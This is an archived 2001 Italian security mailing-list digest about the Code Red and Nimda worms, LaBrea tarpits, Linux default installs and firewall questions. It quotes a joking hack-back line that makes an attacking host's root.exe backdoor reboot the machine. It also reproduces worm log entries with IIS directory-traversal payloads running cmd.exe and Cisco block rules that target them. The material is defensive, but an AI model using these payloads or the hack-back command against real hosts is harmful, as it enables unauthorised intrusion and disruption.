[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Ottobre 2001 ml@sikurezza.org Soggetto: postone... Mittente: Igor Falcomata' Data: 2 Oct 2001 19:49:04 -0000
Ok, con immenso ritardo ho fatto un collage di alcuni dei post che erano andati scaduti, principalmente del 18/19 Sep. Seguono qui.. ovviamente molti saranno ormai privi di particolare significato, quindi prima di replicare a qualcuno dei messaggi qui dentro vi pregherei di verificare che abbia ancora senso replicare (in particolar modo ai thread su code-red, nimda & co e a quello sulle inst. di default). Quelli che non sono compresi qui, probabilmente sarebbero stati rejectati. Se ritenete che un vostro post del 18/19 Sep. sia stato immeritatamente dimenticato in questa lista, inviatelo pure.. Bye Koba (moderatore) ps: gia' che ci sono, vi pregherei di fare attenzione ai quote (usare il >, includere solo le righe che servono, evitare di quotare firme pubblicita' e compagnia briscola, inserire una riga bianca tra il testo quotato e il testo proprio, usare dei mailer decenti, etc.) ·ps2: pregherei anche, principalmente chi posta messaggi per la prima volta o chiede informazioni "security-basics" like di controllare negli archivi, usando anche l'apposito motore di ricerca se si tratta di argomenti gia' discussi e, prima di postare, verificare che le informazioni richieste non siano gia' state fornite.. e' chiaro che qui c'e' spazio per tutti, ma se perdendo venti secondi possiamo evitare di far perdere tempo e banda a piu' mille persone, e' cosa buona e giusta(tm) ##### inizio messaggi vari e sfusi ##### From: "Diego Tironi" <diegotironi<at>katamail.com> To: <ml<at>sikurezza.org> Subject: Smorzare l'effetto RED-CODE Date: Tue, 18 Sep 2001 15:18:17 +0200 Vi forwardo il "manifesto" di questo simpatico tool: -- First we slooooowed 'em down... ...Now, we're gonna' STOP 'em. Announcing: LaBrea 2.0 It all started a few weeks ago when we read this innocent little paragraph in Chapter 22 of Steven's TCP/IP Illustrated, Vol. 1: "The characteristic of the persist state that is different from the retransmission timeout in Chapter 21 is that TCP never gives up sending window probes. These window probes continue to be sent at 60-second intervals until the window opens up or either of the applications using the connection is terminated." What a lovely word "NEVER" is.... As you may or may not know, LaBrea 1.x is a small Linux-based application that puts unused IP addresses on your network to use, creating a "tarpit" which slows down scans of your address space by establishing connections and forcing inbound connections to time-out. LaBrea automates the process of "grabbing" unused IP addresses and adding them to its pool of "tarpit" addresses. But now, thanks to the word NEVER, we can take "active defense" to a whole new level. LaBrea is beginning to generate interest in those who know that an active stance against REAL attackers is necessary to the continued health of the Internet: "LaBrea gives its users a tactical advantage over 'zombie' computers like those compromised by the Code Red worms. The computer security industry will find it a very intriguing utility." -- Rob Rosenberger, editor, Vmyths.com **New in LaBrea 2.0** When LaBrea is started with the "-p" flag, it will force connection attempts into the "persist" state. You grab 'em, hold 'em, and NEVER let 'em go. Yes, that's right... I said "*NEVER* LET THEM GO"... How does it work? Technical details: The LaBrea "server" software allows a normal three-way handshake in response to a connect attempt. During the handshake, the server sets a small (5 byte) TCP window. When the client sends its first 5 bytes of data, the server responds with a TCP window of 0 (wait). The client then shifts into the "persist" state, where it sends what are called "window probe" packets at intervals that increase to a maximum of 4 minutes for an NT stack. The LaBrea server answers these probes to hold the client in the persist state. At this point, a connection can be maintained with a throughput of approximately 1215 bytes per hour. All of this can be done without maintaining any "state" on the connections. This vastly simplifies LaBrea's code. Because you're holding connections open, and because there is a bandwidth "cost" associated with doing that, the "-p" option requires that you specify the maximum bandwidth (in bytes/second) that you want to allocate to doing this. You set the maximum bandwidth, fire it off, and LaBrea takes care of the rest. It keeps a 5 minute running window of bandwidth allocated to holding open connections, and does it's best to keep you at or near the maximum you allow. (FYI: 1 byte/second is roughly equal to 3 scanning threads). What happens to the threads you don't grab? LaBrea still tarpit's 'em... just like before. Using LaBrea before was a whole lot of fun... Now, it's just incredible. I've had people ping scanning "virtual machines", running NMap on them, and even some enterprising folks very interested in the version of BIND that my LaBrea machines are running. Ladies and gentlemen, we really CAN make a difference. But don't just take my word for it: check it out for yourself. At the HackBusters site, we have a page showing the current "live" activity in our very own tarpit. You can see the folks that are just visiting, and you can also check out a list of the very "special" people that we're hanging onto INDEFINITELY. While you're there, grab a copy of the source code to LaBrea, or read our white paper entitled "Welcome to My Tarpit - The Tactical and Strategic Use of LaBrea." While you're looking at the "VIPs" as we're calling them, notice something: I've held onto some of them for more than 5 days... No, you didn't mis-read that: *5 DAYS*... And don't be fooled by the fact that everything there seems to be aimed at port 80. Hackbusters lil' chunk o' IP space just seems to be sitting in the midst of CodeRed central... LaBrea will capture anything that tries to initiate a full connection on ANY port. Over the weekend, we had some Gnutella scanners on the line until they got a clue and gave up... We believe that by using tools like LaBrea, we can actually make a strong proactive stand to improve the "health" of the Internet. Please consider setting up a tarpit. Please pass the word to others. See: http://www.hackbusters.net Questions and comments can be directed to the address on the HackBusters site. -- Qualcuno l'ha gia provato? Fatemi sapere cosa ne pensate. -- Diego Tironi - dedox<at>tin.it - Bergamo PGP DH/DSS Key ID: 0x0F752EF8 Fingerprint: 36BF 20FB 45D7 165E 5041 6E4E 79F5 97CE 0F75 2EF8 Veritas vos liberabit ##### Date: Tue, 18 Sep 2001 15:55:28 +0200 From: David Coppa <coffeec<at>tin.it> To: ml<at>sikurezza.org Subject: Re: Problema con vecchio worm "redcode" .... * On Tue Sep 18, 2001 at 01:15:54PM +0200, Enrico Valsecchi wrote: > Ciao a tutti, > spero che qualcuno gentilmente mi possa dare aiuto ! > > A distanza di quasi 2 mesi, > ho ancora molteplici richieste della famosa pagina > "default.ida?" sui miei servers .... > Se non puoi bloccarlo a monte sul router (come diceva Naif), il modo migliore e', anche per me, cercare di "ignorare" il problema. Puoi creare un file default.ida vuoto e aggiungere queste righe ai file di conf di Apache: SetEnvIf Request_URI \.ida$ unwanted CustomLog logs/access_log common env=!unwanted Almeno cosi' eviti la sporcizia nei log. Tra le "soluzioni" piu' fantasiose che ho visto in rete c'e' sicuramente questa: un file default.ida con dentro <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/reboot"--> :)) Saluti -- David Coppa (Caff) <coffeec (at) tin.it> GnuPG PubKey: finger caff@relay.itbm.rm.cnr.it | gpg --import Fingerprint: 555B 798A AE7E 3C76 C1DD 5929 7E0A E8C8 F120 C227 ##### From: "Amodiovalerio Verde" <amover<at>wipsrl.it> To: <ml<at>sikurezza.org> Subject: Re: Installazioni di default di linux Date: Tue, 18 Sep 2001 16:58:04 +0200 ----- Original Message ----- From: "MrZzz" <mrzzz<at>tiscalinet.it> To: <ml<at>sikurezza.org> Sent: Monday, September 17, 2001 8:38 PM Subject: Re: Installazioni di default di linux > Secondo me, c'e' lo strumento giusto per tutto. Un bambino che vuole > fare un castello di sabbia non usa un Caterpillar... :) Dipende da quanto lo vuoi fare grande :P ...dico solo la mia... un tempo ricordo...assieme al dos davano un manuale da leggere per utilizzarlo... con windows questa 'usanza' e' morta... ma manuali per linux ci sono...chi vuole usarlo non potrebbe leggere un po prima ??? D'altronde non c'e' nulla che non sia documentato o nei doc ufficiali (howto e cose varia) o nei vari README, LEGGIMI, etc delle distro... Valerio [Hypo] Verde ##### Date: Tue, 18 Sep 2001 00:24:59 +0200 From: "Dr. Foobar" <piccia2<at>libero.it> To: ml<at>sikurezza.org Subject: Re: Installazioni di default di linux Il giorno Sat, Sep 15, 2001 at 11:59:55PM +0200, Raistlinmage ha scritto: > a configurare un firewall... A questo punto le distribuzioni linux non potrebbero installare > un sistema di default piu' sicuro? togliere tutti quei demoni inutili che ormai in pochi > utilizzano? Parlo del telnetd, fingerd, talk e via dicendo... Gli utenti che poi vorranno > questi demoni impareranno ad installarli e configurarli... Perche' un sistema appena > installato deve avere attivo ftp e ssh? Non tutti utilizzano linux come server, non vedo > motivazione per farli installare di default in un sistema... > Voi che ne pensate? sostanzialmente il mio pensiero si riassume in due punti: 1) cosi' imparano ad usare porcherie come mandrake :)). Scherzi a parte: e' una cosa che varia da distribuzione a distribuzione. L'utente consapevole installa una distro che non prende decisioni per conto suo e che ti chiede cosa vuoi installare e cosa no. Debian ad esempio, o per i piu' paranoici trustix. 2) l'utente medio non dovrebbe utilizzare linux. Linux non e' nato come sistema "desktop". E francamente ne ho le scatole piene di sentire gente che dice che linux DEVE diventare idiot-proof, facile da usare tramite una bella interfaccia grafica tutta colorata, due click e fai tutto... linux non e' nato per questo, e per queste esigenze esistono altri sistemi operativi piu' adatti. Questa mentalita' IMHO sta portando linux alla rovina. -- `cat ~/.mutt/signature` ##### From: "Giorgio Calarco" <gcalarco<at>deis.unibo.it> To: <ml<at>sikurezza.org> Subject: nuovo o vecchio worm ? Date: Tue, 18 Sep 2001 17:49:39 +0200 salve a tutti, mi aggancio implicitamente al thread su red code per segnalare che da qualche ora (circa le 15) nei log di apache mi trovo anche questa novità: [Tue Sep 18 17:33:03 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/root.exe [Tue Sep 18 17:33:03 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/MSADC/root.exe [Tue Sep 18 17:33:03 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/c/winnt/system32/cmd.exe [Tue Sep 18 17:33:04 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/d/winnt/system32/cmd.exe [Tue Sep 18 17:33:04 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/..%5c../winnt/system32/cmd.exe [Tue Sep 18 17:33:04 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [Tue Sep 18 17:33:05 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [Tue Sep 18 17:33:05 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/msadc/..%5c../..%5c../..%5c/....../....../....../winnt/s ystem32/cmd.exe [Tue Sep 18 17:33:06 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/....../winnt/system32/cmd.exe [Tue Sep 18 17:33:06 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/....../winnt/system32/cmd.exe [Tue Sep 18 17:33:10 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/....../winnt/system32/cmd.exe [Tue Sep 18 17:33:11 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/..%5c../winnt/system32/cmd.exe [Tue Sep 18 17:33:11 2001] [error] [client 137.204.211.84] File does not exist: /home/httpd/www/ccc/scripts/..%2f../winnt/system32/cmd.exe il numero di richeste in arrivo è in costante aumento. il giochino mi pare di averlo già visto, ma ora pare "automatizzato"... qualcuno sa di preciso di che cosa si tratti ? cioa, giorgio ##### Date: Tue, 18 Sep 2001 18:50:33 +0200 (CEST) From: natas <root<at>1nf3rn0.net> To: <ml<at>sikurezza.org> Subject: Re: Installazioni di default di linux >Sicuramente Linux non e' un os per desktop di utenza casalinga nel suo >stadio attuale. Agli utenti con il cervello atrofizzato >dall'user-friendlyness di Windows, bisogna porre sul piatto d'argento >tutti i passi: anche tu secondo me hai una visione elitaria di linux. e' senza dubbio vero che ci sono utenti che installano slakware per un uso casalingo e una settimana dopo si lamentano perche' hanno subito attacchi su demoni che potevano essere anche non eseguiti o filtrati, ma per ogni utente di questi ce ne sara' (spero) uno che consapevole della sua preparazione installera' una distribuzione adatta all'uso. >redhat e quegli altri dovrebbero semplicemente inserire nella procedura >di installazione qualche quesito in piu` per chiedere se si vogliono >attivare o meno i vari servizi che non deve essere "vuoi apache si/no?", >seno` non e` piu` utont-friendly, dev'esserci pure la spiegazione di cosa e` apache >e pure la spiegazione di cosa e` un web server, e la risposta di default >dev'essere "no" giustissimo, ma pensa che al mondo ci sono miliardi di automobili ma pochi sanno come funziona il loro antifurto... gli basta sapere che premendo il bottoncino la macchina e' sicura... (mi dirai "si, ma sanno almeno cos'e' un antifurto!" e' vero ma lo sanno perche' e' uno strumento COMUNE della cui esistenza e funzionalita' sanno tutti) bisognerebbe avere distribuzioni SOLO desktop (che abbiano solo opzioni COMUNI) e altre SOLO server/smanettamenti (win95/winNT ???) in modo da: 1)abbraciare un numero superiore di utenti e raggiungere le vette tra gli altri os desktop 2)far crescere la consapevolezza riguardo la scelta della distribuzione tutto rigorosamente IMHO... natas p.s.: abbandoniamo l'idea che chi "cavalca" linux e' innegabilmente un guru :) al massimo netbsd! :)) ##### From: "Gianluca Guerra" <glguer<at>tiscalinet.it> To: <ml<at>sikurezza.org> Subject: Nuovo virus o falso allarme Date: Tue, 18 Sep 2001 23:03:40 +0200 Salve, oggi nell' ISP in cui lavoro un cliente, titolare di una lan con server Win 2000, ha comunicato che gli sono arrivati in un messaggio di posta due allegati, uno chiamato "esempio.eml" e l'altro "desktop.eml", li per li non ci ha fatto caso, poi dopo qualche ora ha visto i file di cui sopra nel desktop e distrattamente li ha aperti pensando che fosse del materiale inviatogli da un suo collaboratore, appena aperti è apparso un messaggio in cui si diceva che i file non possono essere aperti con outlook, poi, rivviata la macchina erano presenti questi due file in onguna delle cartelle dei due HD in mirroring per un totale di 3000 file. Come se non bastasse outlook non parte più, Norton è stato by-passato e la scansione non può essere più lanciara per via della corruzzione di alcuni file. Ora, io non ho ancora visto la macchina, ma non mi pare di aver visto nessun problema simile, potrebbe essere un nuovo virus??? Visto che Norton aggiornato questo mese non lo vede? P.S. metterò il resoconto dopo aver visto la macchina sul mio sito, che attualmente non riesco ad aggiornare per via di alcuni problemi con il client FTP, lo aggiornerò a giorni, mi scuso per il problemino. Gianluca Guerra http://www.glguer.net ##### Date: Wed, 19 Sep 2001 07:51:58 +0200 (CEST) From: sysadmin<at>metropol.it To: ml<at>sikurezza.org Subject: Nuovo Worm IIS Da ieri pomeriggio alle ore 16 subiamo tentativi di intrusione da script kiddies che usano probabilmente dei batch scripts per trovare eventuali vulnerabilita' di IIS. Gli stessi tentativi sono stati individuati da hosts diversi sulla mia rete di casa in dial up, su una rete coreana da me amministrata ( :))) ) sulla hdsl di un sysadmin amico, sulla rete del polito, e in altre parti del mondo. Un nuovo Worm ??? Pasto stralcio dei logs, tentativo inutile da me, visto che vivo in un mondo M$ free. china.chinagreenlink.com - - [19/Sep/2001:08:14:30 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 china.chinagreenlink.com - - [19/Sep/2001:08:14:30 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 62.236.110.210 - - [19/Sep/2001:08:38:22 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 62.236.110.210 - - [19/Sep/2001:08:38:23 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 e centinaia di altri ! Occhio ai logs quindi e occhio al traffico per chi come noi paga a tariffa al Mb. Un saluto e un abbraccio Joy ( MEGA OT - Sabato Ore 11 - Municipio di Asti - Io e Patty ci sposiamo ) ( Gli iscritti che mi conoscono e mi vogliono bene sono invitati ) ---------------------------------- E-Mail: sysadmin<at>metropol.it Date: 19-Sep-2001 Time: 07:43:55 This message was sent by XFMail ---------------------------------- ##### Date: Wed, 19 Sep 2001 10:09:56 +0200 To: ml<at>sikurezza.org From: Raffaele Conte <raf<at>ifc.cnr.it> Subject: Fwd: Nimda (Code Rainbow) Worm DDOS Visto la massiccia diffusione in queste ore del worm, ve la rigiro: >From: "Francesco Palmieri" <fpalmier<at>unina.it> >To: "GARR GURU" <discussione<at>garr.it>, <sicurezza<at>garr.it> >Cc: "GARR-CERT" <cert<at>garr.it> >Subject: Nimda (Code Rainbow) Worm DDOS >Date: Wed, 19 Sep 2001 00:47:27 +0200 >X-Priority: 3 >Sender: owner-sicurezza<at>axgarr.dir.garr.it >Reply-To: sicurezza<at>garr.it >X-scanner: scanned by Inflex 1.0.8 - (http://pldaniels.com/inflex/) > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >E' da oggi in massiccia diffusione su tutta la rete il Worm "Nimda" >(o Code Rainbow) che sta dando origine a significativi DoS >propagandosi attraverso una vulnerabilita' gia' nota di IIS >(Microsoft Bulletin MS00-078): > >http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm >.html >http://vil.nai.com/vil/virusSummary.asp?virus_k=99209 >http://www.incidents.org/alert.txt >http://www.cert.org/current/current_activity.html > >Per il blocco del principale DoS indotto dalla propagazione del Worm >vi ripropongo la tecnica basata su Cisco NBAR che vi avevo gia' >presentato per il "Code Red" nella mia precedente mail "Blocco Worm >Code Red" del 20/8. Al momento non vedo altre alternative, al di la' >di quella di bloccare drasticamenteil traffico sulla porta 80 con >tutto cio' che ne consegue. Il carico tuttora indotto dalla >diffusione vie e-mail del worm non sembra avere impatti significativi >sulla rete. > >Questa e' la class-map estesa a volo, (la sto provando e pare che >funzioni!) con gli hooks per la propagazione del "Rainbow Code": > > Router(config)#ip cef > Router(config)#class-map match-any http-hacks > Router(config-cmap)#match protocol http url "*default.ida*" > Router(config-cmap)#match protocol http url "*x.ida*" > Router(config-cmap)#match protocol http url "*.ida*" > Router(config-cmap)#match protocol http url "*cmd.exe*" > Router(config-cmap)#match protocol http url "*root.exe*" > ! Rainbow code hook > Router(config-cmap)#match protocol http url "*/../*" > >Successivamente va definita la policy-map che governa il marking >attraverso >l'uso di uno specifico "DiffServ" DSCP del traffico >sopra individuato: > > Router(config)#policy-map mark-inbound-http-hacks > Router(config-pmap)#class http-hacks > Router(config-pmap)#set ip dscp 1 > >la policy di marking va quindi applicata a livello di border >interface: > > Router(config)#int atm 0/0/0.1 > Router(config-if)#service-policy input mark-inbound-http-hacks > >ed infine tutto il traffico associato al DSCP di cui sopra va >filtrato >attraverso un'opportuna ACL (tutti i tentativi di propagazione >saranno >loggati): > > Router(config)#access-list 105 deny ip any any dscp 1 log > Router(config)#access-list 105 permit ip any any > >che naturalmente va applicata alle interfacce di acesso alla rete >interna: > > Router(config)#int fast 0/0/0 > Router(config-if)#ip access-group 105 in > >Consiglio di applicare la stessa policy anche nella direzione opposta >(ad es. in ingresso sulla eth di accesso al border router) con ACL >applicata in out sulla border interface per bloccare il traffico >delle proprie macchine gia' compromesse verso l'esterno. > >Vi ricordo che disponibilita' di tutte le funzionalita' necessarie >rapportate alle >versioni minimali di IOS disponibili sulle varie piattaforme cisco e' >riportata nella tabella seguente: > > Piattaforma minima versione IOS > 7500 12.1(6)E > FlexWAN 12.1(6)E > 7200 12.1(5)T > 7100 12.1(5)T > 3660 12.1(5)T > 3640 12.1(5)T > 3620 12.1(5)T > 2600 12.1(5)T > 1700 12.2(2)T > >Vi saluto Cordialmente > > Francesco Palmieri > GARR CERT > >-----BEGIN PGP SIGNATURE----- >Version: PGP 7.0.4 > >iQA/AwUBO6fO+8E65qHZbmIPEQITCACg7BztS8NxrGeRDJ2ay6R+4uG0/hkAoKmO >ibkekf12jk1FCgvTtl5EouXU >=ljIN >-----END PGP SIGNATURE----- -- raf ##### Date: Wed, 19 Sep 2001 11:48:55 +0200 From: "FuSyS" <fusys<at>s0ftpj.org> To: <ml<at>sikurezza.org> Subject: Le solite installazioni di default e le solite ignote distro di Linux Avendo gustato il thread tutto insieme, una quindicina di messaggi in tutto, ben ingoiati uno dietro all'altro sono contento di poter affermare che niente cambia mai. Ed e' bello trovarsi in un ambiente accogliente e 'familiare' dopo tutti questi anni. L'arrivo di messaggi di fantomatici =) membri della setta dei Debianisti incappucciati mi riporta ai bei tempi delle diatribe tra CBM-64 e ZX Spectrum. Grazie per il revival! :) Ora, tornando alla sicurezza, che non e' ahime' come evidentemente pensano in molti, una 'feature' di una distro piuttosto che di un'altra, trovo lecito affermare che ci si dimentica spesso del lato piu' ovvio: - la mia distro preferita, il mio OpenBSD 2.x super-leet, le patch della NSA, PGP, firewalls e IDS NON sono NE' FANNO sicurezza. Sono strumenti. Punto. In quanto tali sono utilizzati da ME. E se io sono tonto, i miei strumenti saranno utilizzati in maniera tonta. Ammesso anche che valga il principio per cui un ottimo strumento puo' prevenire il mio comportamento piu' tonto, regalandomi un livello di media tontaggine, alla fine, come accaduto nell'episodio di Apache, mi trovero' in una situazione in cui le MIE azioni, non quelle dell'IDS, o le azioni di miei peer, metteranno a repentaglio la mia sicurezza. Questo come PREMESSA. Se la accogliamo, e direi di farlo, anche solo per non tediare Koba con sterili flame, allora possiamo capire che: - se e' vero che Linux richiede piu' consapevolezza di quanta non ne possieda una segretaria, almeno per quanto riguarda un sistema operativo, allora e' forse STUPIDO installare un sistema che, dotato di feature di installazione sicura, possa esser lasciato a se' stesso senza hardening o controllo prima di esser utilizzato in ambienti mission o security critical. In questo caso allora preferisco sicuramente editare un file inetd.conf o xinetd.d/* e passarlo su tutte le macchine della stessa classe e tipologia di servizio. Mi preoccupero' DOPO di quanto questa distro si sbatta per aiutarmi. Poi parliamoci chiaro: - i lamentiamo spesso del fatto che utenti nuovi del mondo Linux NON LEGGANO MAI UNA FAVA di docs o faqs. Eppure preferiamo che per un concetto come quello della security ci sia una macchina installata di default come sicura. Grazie OpenBSD, ti amo ma anche tu ogni tanto soffri. Facciamo capire come configurare il sistema con un occhio alla sicurezza, non lasciamolo fare ad uno script. Oltretutto mi chiedo se davvero serva un concetto, da me apprezzato, come quello degli rpm o deb ANCHE per la sicurezza. Davvero la persona responsabile della sicurezza preferirebbe installazioni di default che risultino sicure COME RIPORTATO SULLA CONFEZIONE DELLA DISTRO ? Sinceramente io non credo. Sono d'accordo che probabilmente si risparmierebbe un po' di tempo in fase di post-installazione, ma che diamine, io ho imparato a conoscere molte delle porte assegnate e l'utilizzo di fuser grazie alle installazioni di default =;P Lasciamo che la consapevolezza colpisca anche i nuovi utilizzatori... Sono d'accordo che questo forse NON avvicina molto Linux al mondo workstation. Ma ehi, non ho mai detto che Linux DEBBA avvicinarsi al mondo home o consumer. Se cosi' fosse, bhe allora non stupiamoci di nulla, visto come vanno le installazioni di default nei cosiddetti sistemi home o end-user. Per concludere con un pizzico di ironia, vorrei ricordare che mentre ci si scannava tra cbm64 e zx speccy c'era chi rideva alle nostre spalle sugli AppleII o primi Mac [a torto o a ragione non saprei ne' mi interessa sapere]... La sicurezza non e' un OS, non e' una installazione, forse ormai in un mondo come quello di internet non e' piu' nemmeno un concetto. E' consapevolezza umana. Se manca questo anello della catena, tutto il resto della meravigliosa impalcatura credo andra' a ramengo. AMEN. P.S. sisi e' vero :PPP ho finalmente finito gli esami dell'uni !!! -- -- FuSyS [S0ftPj|BFi] http://www.s0ftpj.org/ It seems today I've nothing better to do. Go figure. ;) -- -- ##### From: "Giacomino Falgiano" <g.falgiano<at>ifinet.it> To: <ml<at>sikurezza.org> Subject: Cisco security policy manager Date: Wed, 19 Sep 2001 12:39:22 +0200 Ciao a tutti! Sto facendo una ricerca sul security policy manager di Cisco, ma naturalmente non riesco a trovare proprio quello che cerco... Qualcuno di voi conosce questo software? L' informazione che sto cercando è questa: la GUI può essere installata su una moltitudine di macchine remote,locali, ecc... o deve essere una sola? Se possono essere più di una possono lavorare assieme(ad es. un azienda mantiene un server che centralmente ha tutte le policy dei clienti, poi più amministratori potranno lavorare su ogni cliente separatamente)? Per chi lo conosce, è un po' quello che fa Provider-1 di Checkpoint. Grazie in anticipo dell' aiuto. mino ##### Date: Wed, 19 Sep 2001 12:48:51 +0200 From: "Fabio Pietrosanti (naif)" <naif<at>sikurezza.org> To: ml<at>sikurezza.org Subject: FW: [ LugRoma: corsi di kernelhacking ] Forwardo questo messaggio perche' sembra che al LUG di Roma stiano organizzando un corso molto interessante. ----- Forwarded message from La Leva di Archimede <ivan<at>laleva.cc> ----- Date: Wed, 19 Sep 2001 09:38:10 +0200 To: cyber-rights<at>ecn.org From: La Leva di Archimede <ivan<at>laleva.cc> Subject: [cyber~rights] LugRoma: corsi di k3rn3lhacking http://bravo.ce.uniroma2.it/kernelhacking/ just to know! I. ----- End forwarded message ----- -- Fabio Pietrosanti ( naif ) E-mail: naif<at>sikurezza.org - naif<at>blackhats.it PGP Key (DSS) http://naif.itapac.net/naif.asc -- Free advertising: www.openbsd.org Multiplatform Ultra-secure OS Free Flame: IPFilter sucks ! ##### Date: Wed, 19 Sep 2001 15:56:34 -0000 (GMT) From: goony<at>inwind.it To: ml<at>sikurezza.org Subject: passive & firewall Salve, sperando di non essere fuori tema... Ho letto in rete alcuni documenti circa il "passive mode", ma nessuno mi ha convinto molto. Sapreste scrivermi 2 righe di spiegazione? Secondo problema. Sto utilizzando "proftpd 1.2.2" e "gShiled" (iptables)come firewall. Ho letto le faq ecc. che dicono di abilitare la porta 20 oltre che la 21, ma niente. Nei log non trovo niente che droppi il firewall. Premetto che il server ftp e' dietro al firewall e ha un indirizzo pubblico grazie ad un redirect delle porte. E' solo il passive mode a non funzionare, da fuori mi loggo senza intoppi. Qualche idea, consigli, insulti? ;) grazie, goony -------------------------- E-Mail: goony<at>inwind.it Date: 19-Sep-2001 Time: 15:43:21 -------------------------- ##### Date: Wed, 19 Sep 2001 18:19:12 +0200 From: "Fabio Pietrosanti (naif)" <naif<at>sikurezza.org> To: ml<at>sikurezza.org Subject: Log analisys and reporting ( quale soluzione ? ) Ciao a tutti, volevo chiedere se qualcuno ha idea su quali prodotti esistono sul mercato che consentano di effettuare la raccolta, l'analisi e il reporting dei log di vari dispositivi di sicurezza. Fra questi includo i piu' utilizzati quali: Cisco PIX, Cisco Router con access-list, Checkpoint FW-1, ISS Realsecure, etc, etc. Conosco solo "netforensics" che effettua questo tipo di lavoro... qualcuno ne' conosce altri ? -- Fabio Pietrosanti ( naif ) E-mail: naif<at>sikurezza.org - naif<at>blackhats.it PGP Key (DSS) http://naif.itapac.net/naif.asc -- Free advertising: www.openbsd.org Multiplatform Ultra-secure OS Free Flame: IPFilter sucks ! ##### END ##### ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005